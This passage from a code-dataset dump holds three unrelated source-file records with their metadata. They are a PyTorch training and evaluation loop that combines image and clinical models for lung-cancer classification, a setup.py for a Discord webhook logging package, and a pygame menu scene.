batch_size\r\n\r\n\r\ndef dr_friendly_measures(outputs, targets):\r\n with torch.no_grad():\r\n outputs = torch.argmax(torch.sigmoid(outputs), dim=1)\r\n\r\n try:\r\n tn, fp, fn, tp = confusion_matrix(targets.cpu().numpy(), outputs.cpu().numpy()).ravel()\r\n specificity = tn / (tn + fp + 1e-12)\r\n sensitivity = tp / (tp + fn + 1e-12)\r\n return specificity, sensitivity\r\n except:\r\n return np.nan, np.nan\r\n\r\n\r\ndef sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\n\r\ndef dr_friendly_measures_reg(outputs, targets):\r\n # outputs = np.argmax(sigmoid(outputs))\r\n\r\n assert np.shape(outputs) == np.shape(targets), 'prediction and target outcomes should be same shape'\r\n\r\n try:\r\n tn, fp, fn, tp = confusion_matrix(targets, outputs).ravel()\r\n specificity = tn / (tn + fp)\r\n sensitivity = tp / (tp + fn)\r\n return specificity, sensitivity\r\n except:\r\n return np.nan, np.nan\r\n\r\n\r\ndef calculate_auc(outputs, targets):\r\n with torch.no_grad():\r\n outputs = torch.sigmoid(outputs)\r\n try:\r\n auc = roc_auc_score(targets.cpu().numpy(), outputs.type(torch.FloatTensor).cpu().data.numpy()[:, 1])\r\n return auc\r\n except:\r\n return np.nan\r\n\r\n\r\ndef calculate_prauc(outputs, targets):\r\n with torch.no_grad():\r\n outputs = torch.sigmoid(outputs)\r\n try:\r\n prauc = average_precision_score(targets.cpu().numpy(),\r\n outputs.type(torch.FloatTensor).cpu().data.numpy()[:, 1])\r\n return prauc\r\n except:\r\n return np.nan\r\n\r\n\r\nclass Trainer:\r\n \"\"\"\r\n Trainer class\r\n \"\"\"\r\n\r\n def __init__(self, args, model, criterion_pre, optimizer, train_data_loader,\r\n valid_data_loader=None, test_data_loader=None, lr_scheduler=None, tb_logger=None):\r\n\r\n self.args = args\r\n self.model = model\r\n self.optimizer = 
optimizer\r\n self.criterion_pre = criterion_pre\r\n self.train_data_loader = train_data_loader\r\n self.len_epoch = len(self.train_data_loader)\r\n self.valid_data_loader = valid_data_loader\r\n self.do_validation = self.valid_data_loader is not None\r\n self.test_data_loader = test_data_loader\r\n self.do_test = self.test_data_loader is not None\r\n self.lr_scheduler = lr_scheduler\r\n\r\n self.save_frequency = 20\r\n self.start_epoch = 1\r\n self.val_loss = 0\r\n\r\n self.print_batch_spacing = 50\r\n self.save_interval = args.save_intervals\r\n self.tb_logger = tb_logger\r\n self.train_count = 0\r\n self.val_count = 0\r\n\r\n def training(self):\r\n\r\n for epoch in range(self.start_epoch, (self.args.n_epochs + 1)):\r\n\r\n for param_group in self.optimizer.param_groups:\r\n lr_show = param_group['lr']\r\n log.info('\\n########################################################################')\r\n log.info(f\"Training epoch: {epoch}, Learning rate: {lr_show:.8f}\")\r\n\r\n self.train_epoch_alex(epoch)\r\n\r\n if self.do_validation:\r\n log.info(f\"Validation epoch: {epoch}\")\r\n self.validate_epoch_alex(epoch)\r\n\r\n if self.lr_scheduler is not None:\r\n self.lr_scheduler.step()\r\n\r\n # # comment out for speed test\r\n # if epoch % self.save_frequency == 0:\r\n # self.model.save_checkpoint(self.args.save,\r\n # epoch, self.val_loss,\r\n # optimizer=self.optimizer)\r\n\r\n print('\\n\\n')\r\n\r\n ###WILL NEED TO TRAIN CLINICAL MODEL HERE###\r\n log.info('loading clinical data')\r\n x_train_clinic, y_train_clinic = \\\r\n clinical_data(args=self.args,\r\n train_mrn_list=self.args.train_mrn_list).load_train_data_batch(\r\n batch_size=len(self.args.train_mrn_list))\r\n # log.info('train data: ', np.shape(x_train_clinic))\r\n\r\n x_val_clinic, y_val_clinic = \\\r\n clinical_data(args=self.args,\r\n val_mrn_list=self.args.val_mrn_list,\r\n train_mrn_list=self.args.train_mrn_list).load_val_data_batch(\r\n batch_size=len(self.args.val_mrn_list))\r\n\r\n # log.info('val data: ', np.shape(x_val_clinic))\r\n\r\n x_test_clinic, y_test_clinic = \\\r\n clinical_data(args=self.args,\r\n train_mrn_list=self.args.train_mrn_list,\r\n test_mrn_list=self.args.test_mrn_list).load_test_data_batch(\r\n batch_size=len(self.args.test_mrn_list))\r\n\r\n\r\n clinical_model_ = clinical_model(args=self.args, X=x_train_clinic, y=y_train_clinic,\r\n model_type=self.args.clinical_model_type).create_model()\r\n\r\n y_pred_val_clinic = clinical_model_.predict_proba(x_val_clinic)\r\n y_pred_train_clinic = clinical_model_.predict_proba(x_train_clinic)\r\n y_pred_test_clinic = clinical_model_.predict_proba(x_test_clinic)\r\n\r\n log.info('predictions made')\r\n\r\n # Creating list to store prediction information from image and clinic based model\r\n auc_store = []\r\n auc_store_clinic = []\r\n\r\n rand_num_cv = np.random.randint(0, 1000)\r\n\r\n ### ASSESSING CLINICAL MODEL ###\r\n print('\\nVALIDATION INFORMATION - CLINICAL BASED MODEL\\n')\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report(np.argmax(y_val_clinic, axis=-1),\r\n np.argmax(y_pred_val_clinic, axis=-1),\r\n target_names=target_names))\r\n\r\n print('\\nTRAIN INFORMATION - CLINIC BASED MODEL\\n')\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report(np.argmax(y_train_clinic, axis=-1),\r\n np.argmax(y_pred_train_clinic, axis=-1),\r\n target_names=target_names))\r\n\r\n print('\\nTEST INFORMATION - CLINIC BASED MODEL\\n')\r\n target_names 
= ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report(np.argmax(y_test_clinic, axis=-1),\r\n np.argmax(y_pred_test_clinic, axis=-1),\r\n target_names=target_names))\r\n\r\n # Clinical model evaluation that will be saved to tensorboard\r\n # Validation results\r\n fig_add = roc_auc_plot(y_val_clinic, y_pred_val_clinic, data_title=f\"Clinical Model Val AUC\")\r\n self.tb_logger.add_figure(f\"Clinical Model Validation AUC\", figure=fig_add)\r\n clinic_spec, clinic_sens = dr_friendly_measures_reg(np.argmax(y_pred_val_clinic, axis=-1), np.argmax(y_val_clinic, axis=-1))\r\n print('sensitivity: ', clinic_sens, 'specificity: ', clinic_spec)\r\n\r\n self.tb_logger.add_scalar(f\"clinic_model_val_spec\", clinic_spec, 0)\r\n self.tb_logger.add_scalar(f\"clinic_model_val_sens\", clinic_sens, 0)\r\n self.tb_logger.flush()\r\n\r\n # AUC values gathered for total prediction model\r\n auc_ = roc_auc_score(y_true=np.argmax(y_val_clinic, axis=-1), y_score=y_pred_val_clinic[:, 1])\r\n print('clinical model auc_: ', auc_)\r\n auc_store_clinic.append(auc_)\r\n\r\n # Train results\r\n fig_add = roc_auc_plot(y_train_clinic, y_pred_train_clinic, data_title=f\"Clinical Model Train AUC\")\r\n self.tb_logger.add_figure(f\"Clinical Model Train AUC\", figure=fig_add)\r\n clinic_spec, clinic_sens = dr_friendly_measures_reg(np.argmax(y_pred_train_clinic, axis=-1),\r\n np.argmax(y_train_clinic, axis=-1))\r\n\r\n self.tb_logger.add_scalar(f\"clinic_model_train_spec\", clinic_spec, 0)\r\n self.tb_logger.add_scalar(f\"clinic_model_train_sens\", clinic_sens, 0)\r\n self.tb_logger.flush()\r\n\r\n # Test results\r\n fig_add = roc_auc_plot(y_test_clinic, y_pred_test_clinic, data_title=f\"Clinical Model Test AUC\")\r\n self.tb_logger.add_figure(f\"Clinical Model Test AUC\", figure=fig_add)\r\n clinic_spec, clinic_sens = dr_friendly_measures_reg(np.argmax(y_pred_test_clinic, axis=-1),\r\n np.argmax(y_test_clinic, axis=-1))\r\n\r\n self.tb_logger.add_scalar(f\"clinic_model_test_spec\", clinic_spec, 0)\r\n self.tb_logger.add_scalar(f\"clinic_model_test_sens\", clinic_sens, 0)\r\n self.tb_logger.flush()\r\n\r\n ### FINISHED ASSESSING CLINICAL MODEL ###\r\n\r\n ### ASSESSING IMAGE MODEL ###\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n # creating PR curve training/validation\r\n for batch_idx, input_tuple in enumerate(self.train_data_loader):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n log.info(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n fig_add = roc_auc_plot(target2_, pred2_, data_title='Training ROC')\r\n self.tb_logger.add_figure(f\"Image Model Train AUC\", figure=fig_add)\r\n\r\n target_ = torch.from_numpy(np.array(target_).astype('int32'))\r\n pred_ = torch.from_numpy(np.array(pred_).astype('int32'))\r\n\r\n self.tb_logger.add_pr_curve(f\"Image Model Training PR Curve\", target_, pred_)\r\n self.tb_logger.flush()\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n for batch_idx, input_tuple in 
enumerate(self.valid_data_loader):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n fig_add = roc_auc_plot(target2_, pred2_, data_title='Validation ROC')\r\n self.tb_logger.add_figure(f\"Image Model Validation AUC\", figure=fig_add)\r\n\r\n # AUC values gathered for total prediction model\r\n auc_ = roc_auc_score(y_true=np.argmax(target2_, axis=-1), y_score=pred2_[:, 1])\r\n auc_store.append(auc_)\r\n\r\n target_ = torch.from_numpy(np.array(target_).astype('int32'))\r\n pred_ = torch.from_numpy(np.array(pred_).astype('int32'))\r\n\r\n self.tb_logger.add_pr_curve(f\"Image Model Validation PR Curve\", target_, pred_)\r\n self.tb_logger.flush()\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n # Testing\r\n for batch_idx, input_tuple in enumerate(self.test_data_loader):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n fig_add = roc_auc_plot(target2_, pred2_, data_title='Test ROC')\r\n self.tb_logger.add_figure(f\"Image Model Test AUC\", figure=fig_add)\r\n\r\n target_ = torch.from_numpy(np.array(target_).astype('int32'))\r\n pred_ = torch.from_numpy(np.array(pred_).astype('int32'))\r\n\r\n self.tb_logger.add_pr_curve(f\"Image Model Test PR Curve\", target_, pred_)\r\n self.tb_logger.flush()\r\n\r\n ### FINISHED ASSESSING IMAGE MODEL ###\r\n\r\n ### ASSESSING IMAGE + CLINIC MODEL ###\r\n\r\n # image factor / (image factor + clinic factor)\r\n alpha_image = auc_store[0] / (auc_store[0] + auc_store_clinic[0])\r\n\r\n # Creating new validation and testing generators for validation\r\n # VALIDATION\r\n validation_dataset_eval = FEEDTUBE(self.args, mode='val',\r\n train_path=self.args.train_dataset_path,\r\n val_path=self.args.val_dataset_path,\r\n test_path=self.args.test_dataset_path,\r\n # dataset_path=args.train_dataset_path,\r\n label_path=self.args.val_label_path,\r\n exclude_mrns=self.args.exclude_mrns,\r\n clinic_image_eval=True)\r\n val_generator_eval = DataLoader(validation_dataset_eval, batch_size=1, shuffle=False, num_workers=0)\r\n\r\n # TESTING\r\n test_dataset_eval = FEEDTUBE(self.args, mode='test',\r\n train_path=self.args.train_dataset_path,\r\n val_path=self.args.val_dataset_path,\r\n test_path=self.args.test_dataset_path,\r\n # dataset_path=args.train_dataset_path,\r\n label_path=self.args.test_label_path,\r\n exclude_mrns=self.args.exclude_mrns,\r\n clinic_image_eval=True)\r\n test_generator_eval = DataLoader(test_dataset_eval, batch_size=1, shuffle=False, num_workers=0)\r\n\r\n # Evaluating image and clinic model performance on 
validation data\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n target2_c = []\r\n pred2_c = []\r\n\r\n for batch_idx, input_tuple in enumerate(val_generator_eval):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n mrn = list(input_tuple[2])\r\n # print(mrn_str)\r\n input_tuple = input_tuple[0:2]\r\n # print(input_tuple)\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n x_val_clinic, y_val_clinic = \\\r\n clinical_data(args=self.args,\r\n val_mrn_list=mrn,\r\n train_mrn_list=self.args.train_mrn_list).load_val_data_batch(batch_size=1)\r\n\r\n y_pred_val_clinic = clinical_model_.predict_proba(x_val_clinic)\r\n target2_c.extend(y_val_clinic)\r\n pred2_c.extend(np.array(y_pred_val_clinic).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n pred2_c_1 = [x[1] for x in pred2_c]\r\n\r\n ### Evaluating loaded data above (Validation, Train, Test)\r\n # printing precision, recall, and fscore for each class for validation data\r\n print('\\nVALIDATION INFORMATION - IMAGE/CLINIC BASED MODEL\\n')\r\n\r\n pred2_[:, 0] = np.add(np.dot(1 - pred2_[:, 1], alpha_image),\r\n np.dot([1 - x for x in pred2_c_1], (1 - alpha_image)))\r\n\r\n pred2_[:, 1] = np.add(np.dot(pred2_[:, 1], alpha_image),\r\n np.dot(pred2_c_1, (1 - alpha_image)))\r\n\r\n assert [np.argmax(np.array(x).tolist()) for x in target2_] == [np.argmax(x) for x in np.array(target2_c)]\r\n\r\n print('COMBINED IMAGE AND CLINIC MODEL - VALIDATION DATA')\r\n\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report([np.argmax(np.array(x).tolist()) for x in target2_],\r\n np.argmax(pred2_, axis=-1),\r\n target_names=target_names))\r\n\r\n # PRED2_ HAS BEEN UPDATED IN THE CODE ABOVE AND REPRESENTS PREDICTION SCORE OF IMAGE AND CLINIC COMBINED\r\n fig_add = roc_auc_plot(\r\n np.array([to_categorical(np.argmax(np.array(x)), self.args.n_classes).tolist() for x in target2_]),\r\n # target2_c,\r\n pred2_,\r\n data_title='Validation Image/Clinic ROC')\r\n self.tb_logger.add_figure(f\"Validation_ROC_Image_Clinic\", figure=fig_add)\r\n\r\n # print(np.array([np.argmax(np.array(x)).tolist() for x in target2_]))\r\n\r\n auc_ = roc_auc_score(\r\n y_true=np.array([np.argmax(np.array(x)).tolist() for x in target2_]),\r\n y_score=pred2_[:, 1])\r\n print('combine image and clinic validation auc: ', auc_)\r\n\r\n # Evaluating image and clinic model performance on TEST data\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n target2_c = []\r\n pred2_c = []\r\n\r\n for batch_idx, input_tuple in enumerate(test_generator_eval):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n mrn = list(input_tuple[2])\r\n # print(mrn_str)\r\n input_tuple = input_tuple[0:2]\r\n # print(input_tuple)\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n 
target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n x_test_clinic, y_test_clinic = \\\r\n clinical_data(args=self.args,\r\n test_mrn_list=mrn,\r\n train_mrn_list=self.args.train_mrn_list).load_test_data_batch(batch_size=1)\r\n\r\n y_pred_test_clinic = clinical_model_.predict_proba(x_test_clinic)\r\n target2_c.extend(y_test_clinic)\r\n pred2_c.extend(np.array(y_pred_test_clinic).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n pred2_c_1 = [x[1] for x in pred2_c]\r\n\r\n ### Evaluating loaded data above (Validation, Train, Test)\r\n # printing precision, recall, and fscore for each class for validation data\r\n print('\\nTest INFORMATION - IMAGE/CLINIC BASED MODEL\\n')\r\n\r\n pred2_[:, 0] = np.add(np.dot(1 - pred2_[:, 1], alpha_image),\r\n np.dot([1 - x for x in pred2_c_1], (1 - alpha_image)))\r\n\r\n pred2_[:, 1] = np.add(np.dot(pred2_[:, 1], alpha_image),\r\n np.dot(pred2_c_1, (1 - alpha_image)))\r\n\r\n assert [np.argmax(np.array(x).tolist()) for x in target2_] == [np.argmax(x) for x in np.array(target2_c)]\r\n\r\n print('COMBINED IMAGE AND CLINIC MODEL - Test DATA')\r\n\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report([np.argmax(np.array(x).tolist()) for x in target2_],\r\n np.argmax(pred2_, axis=-1),\r\n target_names=target_names))\r\n\r\n\r\n # PRED2_ HAS BEEN UPDATED IN THE CODE ABOVE AND REPRESENTS PREDICTION SCORE OF IMAGE AND CLINIC COMBINED\r\n fig_add = roc_auc_plot(\r\n np.array([to_categorical(np.argmax(np.array(x)), self.args.n_classes).tolist() for x in target2_]),\r\n # target2_c,\r\n pred2_,\r\n data_title='Test Image/Clinic ROC')\r\n self.tb_logger.add_figure(f\"Test_ROC_Image_Clinic\", figure=fig_add)\r\n\r\n auc_ = roc_auc_score(\r\n y_true=np.array([np.argmax(np.array(x)).tolist() for x in target2_]),\r\n y_score=pred2_[:, 1])\r\n print('combine image and clinic test auc: ', auc_)\r\n\r\n self.tb_logger.close()\r\n\r\n def train_epoch_alex(self, epoch):\r\n\r\n # Creates once at the beginning of training\r\n\r\n def time_report(initial_time, time_name):\r\n get_time_diff = time.gmtime(time.time() - initial_time)\r\n readable_time = time.strftime(\"%M:%S\", get_time_diff)\r\n print(f\"{time_name} time: {readable_time} (min:seconds)\")\r\n del get_time_diff\r\n del readable_time\r\n\r\n epoch_start_time = time.time()\r\n self.model.train()\r\n\r\n # Storing epoch values obtained from batch calculations\r\n loss_cum = []\r\n auc_cum = []\r\n prauc_cum = []\r\n spec_cum = []\r\n sens_cum = []\r\n\r\n log.info('-------------------------------------------------------------------------------------------')\r\n\r\n for batch_idx, input_tuple in enumerate(self.train_data_loader):\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # may need to turn on if want to train fully but off for transfer learning\r\n # input_tensor.requires_grad = True\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n\r\n # calculating loss and metrics\r\n loss = self.criterion_pre(pred, target.long().view(-1))\r\n\r\n # need to calculate gradient\r\n self.model.zero_grad()\r\n\r\n loss.backward()\r\n\r\n def clip_gradient(optimizer, grad_clip):\r\n for group in optimizer.param_groups:\r\n for param in group[\"params\"]:\r\n if param.grad is not None:\r\n param.grad.data.clamp_(-grad_clip, grad_clip)\r\n\r\n 
clip_gradient(self.optimizer, 5)\r\n self.optimizer.step()\r\n\r\n # Calculating and appending\r\n with torch.no_grad():\r\n auc = calculate_auc(pred, target)\r\n prauc = calculate_prauc(pred, target)\r\n spec, sens = dr_friendly_measures(pred, target)\r\n\r\n # storing loss and metrics\r\n loss_cum.append(loss.item())\r\n auc_cum.append(auc)\r\n prauc_cum.append(prauc)\r\n spec_cum.append(spec)\r\n sens_cum.append(sens)\r\n\r\n if (batch_idx + 1) % self.print_batch_spacing == 0:\r\n log.info(f\"\\tBatch {batch_idx + 1} of {len(self.train_data_loader)}\")\r\n log.info(\r\n f\"\\tLoss: {loss.item()}, PRAUC: {prauc}, AUC: {auc}, Sensitivity: {sens}, Specificity: {spec}\")\r\n log.info('\\t**************************************************************************')\r\n else:\r\n pass\r\n\r\n # self.tb_logger.add_pr_curve('training_PR_curve', target_, pred_, global_step=0)\r\n\r\n # test_str = f\"training_loss-{self.args.short_note}\"\r\n self.tb_logger.add_scalar(f\"training_loss\", loss.item(), self.train_count)\r\n self.tb_logger.add_scalar(f\"training_auc\", auc, self.train_count)\r\n self.tb_logger.add_scalar(f\"training_prauc\", prauc, self.train_count)\r\n self.tb_logger.add_scalar(f\"training_sensitivity\", sens, self.train_count)\r\n self.tb_logger.add_scalar(f\"training_specificity\", spec, self.train_count)\r\n\r\n self.tb_logger.flush()\r\n\r\n # train count for tensorboard logging\r\n self.train_count += 1\r\n\r\n if not self.args.ci_test:\r\n # save model\r\n if batch_idx == 0 and (epoch * len(self.train_data_loader)) != 0 and (\r\n epoch * len(self.train_data_loader)) % self.save_interval == 0:\r\n # if batch_id_sp != 0 and batch_id_sp % save_interval == 0:\r\n model_save_path = '{}_epoch_{}_batch_{}.pth.tar'.format(self.args.save_folder, epoch, batch_idx)\r\n model_save_dir = os.path.dirname(model_save_path)\r\n if not os.path.exists(model_save_dir):\r\n os.makedirs(model_save_dir)\r\n\r\n log.info('Save checkpoints: epoch = {}, batch_id = {}'.format(epoch, batch_idx))\r\n torch.save({\r\n 'epoch': epoch,\r\n 'batch_id': batch_idx,\r\n 'state_dict': self.model.state_dict(),\r\n 'optimizer': self.optimizer.state_dict()},\r\n model_save_path)\r\n\r\n # Calculating time per epoch\r\n ty_res = time.gmtime(time.time() - epoch_start_time)\r\n res = time.strftime(\"%M:%S\", ty_res)\r\n log.info(\r\n f\"Summary-----Loss: {np.round(sum(loss_cum) / len(loss_cum), 4)}, PRAUC: {np.round(np.nanmedian(prauc_cum), 4)}, \"\r\n f\"AUC: {np.round(np.nanmedian(auc_cum), 4)},\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\tSensitivity: {np.round(np.nanmedian(sens_cum), 4)}, \"\r\n f\"Specificity: {np.round(np.nanmedian(spec_cum), 4)}\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\"\r\n f\"Epoch: {res} (min:seconds), # nan: {sum(math.isnan(x) for x in auc_cum)}\")\r\n log.info('-------------------------------------------------------------------------------------------')\r\n\r\n def validate_epoch_alex(self, epoch):\r\n self.model.eval()\r\n\r\n # Storing epoch values obtained from batch calculations\r\n loss_cum = []\r\n auc_cum = []\r\n prauc_cum = []\r\n spec_cum = []\r\n sens_cum = []\r\n\r\n # starting epoch timer\r\n epoch_start_time = time.time()\r\n\r\n log.info('-------------------------------------------------------------------------------------------')\r\n for batch_idx, input_tuple in enumerate(self.valid_data_loader):\r\n\r\n if (batch_idx + 1) % self.print_batch_spacing == 0:\r\n log.info('*************************************')\r\n 
                log.info(f\"\tBatch {batch_idx + 1} of {len(self.valid_data_loader)}\")\r\n            else:\r\n                pass\r\n\r\n            with torch.no_grad():\r\n                input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n                # input_tensor.requires_grad = False\r\n\r\n                pred = self.model(input_tensor)\r\n\r\n                loss = self.criterion_pre(pred, target.long().view(-1))\r\n                auc = calculate_auc(pred, target)\r\n                prauc = calculate_prauc(pred, target)\r\n                spec, sens = dr_friendly_measures(pred, target)\r\n\r\n                # storing loss and metrics\r\n                loss_cum.append(loss.item())\r\n                auc_cum.append(auc)\r\n                prauc_cum.append(prauc)\r\n                spec_cum.append(spec)\r\n                sens_cum.append(sens)\r\n\r\n                if (batch_idx + 1) % self.print_batch_spacing == 0:\r\n                    # log.info('\t**************************************************************************')\r\n                    log.info(f\"\tBatch {batch_idx + 1} of {len(self.valid_data_loader)}\")\r\n                    log.info(\r\n                        f\"\tLoss: {loss.item()}, PRAUC: {prauc}, AUC: {auc}, Sensitivity: {sens}, Specificity: {spec}\")\r\n                    log.info('\t**************************************************************************')\r\n                else:\r\n                    pass\r\n\r\n                self.tb_logger.add_scalar(f\"val_loss\", loss.item(), self.val_count)\r\n                self.tb_logger.add_scalar(f\"val_auc\", auc, self.val_count)\r\n                self.tb_logger.add_scalar(f\"val_prauc\", prauc, self.val_count)\r\n                self.tb_logger.add_scalar(f\"val_sensitivity\", sens, self.val_count)\r\n                self.tb_logger.add_scalar(f\"val_specificity\", spec, self.val_count)\r\n\r\n                self.tb_logger.flush()\r\n\r\n                self.val_count += 1\r\n\r\n        self.val_loss = sum(loss_cum) / len(loss_cum)\r\n\r\n        ty_res = time.gmtime(time.time() - epoch_start_time)\r\n        res = time.strftime(\"%M:%S\", ty_res)\r\n        log.info(\r\n            f\"Summary-----Loss: {np.round(sum(loss_cum) / len(loss_cum), 4)}, PRAUC: {np.round(np.nanmedian(prauc_cum), 4)}, \"\r\n            f\"AUC: {np.round(np.nanmedian(auc_cum), 4)},\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\tSensitivity: {np.round(np.nanmedian(sens_cum), 4)}, \"\r\n            f\"Specificity: {np.round(np.nanmedian(spec_cum), 4)}\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\"\r\n            f\"Epoch: {res} (min:seconds), # nan: {sum(math.isnan(x) for x in auc_cum)}\")\r\n        log.info('-------------------------------------------------------------------------------------------')\r\n","repo_name":"MikeDoho/Lung_Cancer_Classification","sub_path":"lib/Trainers/pytorch_trainer_pretrain_clinic.py","file_name":"pytorch_trainer_pretrain_clinic.py","file_ext":"py","file_size_in_byte":33209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16167533672","text":"# read the contents of README file\nfrom os import path\n\nfrom setuptools import setup\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n    long_description = f.read()\n\nsetup(name='discordlogger',\n      version='0.0.2',\n      description=('A Python logger to send information to Discord Webhooks.'),\n      long_description=long_description,\n      long_description_content_type='text/markdown',\n      url='https://github.com/2press/discord-logger',\n      author='pressure',\n      author_email='pres.sure@ymail.com',\n      license='MIT',\n      packages=['discordlogger'],\n      install_requires=[\n          'requests'\n      ],\n      zip_safe=False)\n","repo_name":"2press/discord-logger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"}
+{"seq_id":"10665499057","text":"import pygame\nfrom pygame import Surface, Rect, draw\nfrom pygame.font import Font, get_default_font\n\nfrom protocols.game import Game\nfrom scene.scene import Scene\n\n\nclass ConfigScene(Scene):\n \n def __init__(self, game: Game):\n super().__init__(\"Config\", game)\n self.options = {\n 'Start': {'selected': True},\n 'Configuration': {'selected': False},\n 'Quit Game': {'selected': False}\n }\n self.background = Surface(game.screen.get_size())\n self.background.fill((0, 120, 0))\n self.font_size = 80\n self.font = Font(get_default_font(), self.font_size)\n \n\n def update(self) -> None:\n super().update()\n self.game.screen.blit(self.background, (0, 0))\n x, y = (self.game.config.WIDTH / 2, self.game.config.HEIGHT / 2)\n for option in self.options:\n render = self.font.render(option, 'True', (255, 255, 255))\n position = render.get_rect(center=(x, y))\n rect = self.game.screen.blit(render, position)\n self.options[option]['rect'] = rect\n y += self.font_size + 5\n for option in self.options.values():\n if option['selected']:\n rect = Rect(\n option['rect'].x - 10,\n option['rect'].y - 10,\n option['rect'].width + 20,\n option['rect'].height + 20\n )\n draw.rect(\n surface=self.game.screen,\n color=(255, 0, 255),\n rect=rect,\n width=5,\n border_radius=10)\n\n# def change_selection(scene: Scene, event: pygame.event) -> None:\n# if event.type == MOUSEBUTTONDOWN and event.button == 1:\n# for option in options.values():\n# if option.rect.collidepoint(pygame.mouse.get_pos()):\n# for _option in options.values():\n# _option.selected = False\n# option.selected = True\n# index = list(options.values()).index(option)\n# print(index, option.name)\n# if event.type == KEYDOWN:\n# if event.key == K_DOWN:\n# for option in options.values():\n# if option.selected:\n# index = list(options.values()).index(option)\n# if (index := index + 1) < len(options):\n# options[list(options)[index]].selected = True\n# option.selected = False\n# if event.key == K_RETURN:\n# for option in options.values():\n# if option.selected:\n# if option.name == 'Start':\n# scene.game.scene = startScene(scene.game)\n# if option.name == 'Quit Game':\n# scene.game.quit()\n# scene.add_action(change_selection)\n# scene.add_system(update)\n","repo_name":"RCristiano/game_project","sub_path":"app/scenes/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8927011304","text":"from __future__ import 